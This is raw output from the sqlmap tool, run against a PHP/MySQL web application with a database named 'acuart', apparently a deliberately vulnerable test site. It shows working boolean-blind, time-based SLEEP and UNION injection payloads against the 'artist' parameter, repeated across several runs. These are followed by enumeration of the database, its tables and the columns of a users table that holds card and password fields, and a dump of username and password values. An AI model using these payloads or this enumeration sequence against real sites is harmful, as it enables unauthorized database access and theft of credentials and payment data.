sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3653=3653

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))VgFB)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9626 UNION ALL SELECT NULL,CONCAT(0x7162766271,0x4d6c626c66426875676e544741547862536b7242594f746c52525452484e415055514f6744765574,0x71786b7171),NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] acuart
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3653=3653

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))VgFB)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9626 UNION ALL SELECT NULL,CONCAT(0x7162766271,0x4d6c626c66426875676e544741547862536b7242594f746c52525452484e415055514f6744765574,0x71786b7171),NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: acuart
[8 tables]
+-----------+
| \x19      |
| artists   |
| carts     |
| categ     |
| e         |
| guestbook |
| pictures  |
| proa      |
+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3653=3653

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))VgFB)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9626 UNION ALL SELECT NULL,CONCAT(0x7162766271,0x4d6c626c66426875676e544741547862536b7242594f746c52525452484e415055514f6744765574,0x71786b7171),NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3653=3653

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))VgFB)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9626 UNION ALL SELECT NULL,CONCAT(0x7162766271,0x4d6c626c66426875676e544741547862536b7242594f746c52525452484e415055514f6744765574,0x71786b7171),NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3653=3653

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))VgFB)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9626 UNION ALL SELECT NULL,CONCAT(0x7162766271,0x4d6c626c66426875676e544741547862536b7242594f746c52525452484e415055514f6744765574,0x71786b7171),NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: acuart
Table: users
[1 entry]
+-------+
| uname |
+-------+
| test  |
+-------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 3653=3653

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 2615 FROM (SELECT(SLEEP(5)))VgFB)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9626 UNION ALL SELECT NULL,CONCAT(0x7162766271,0x4d6c626c66426875676e544741547862536b7242594f746c52525452484e415055514f6744765574,0x71786b7171),NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
Database: acuart
Table: users
[1 entry]
+------+
| pass |
+------+
| test |
+------+

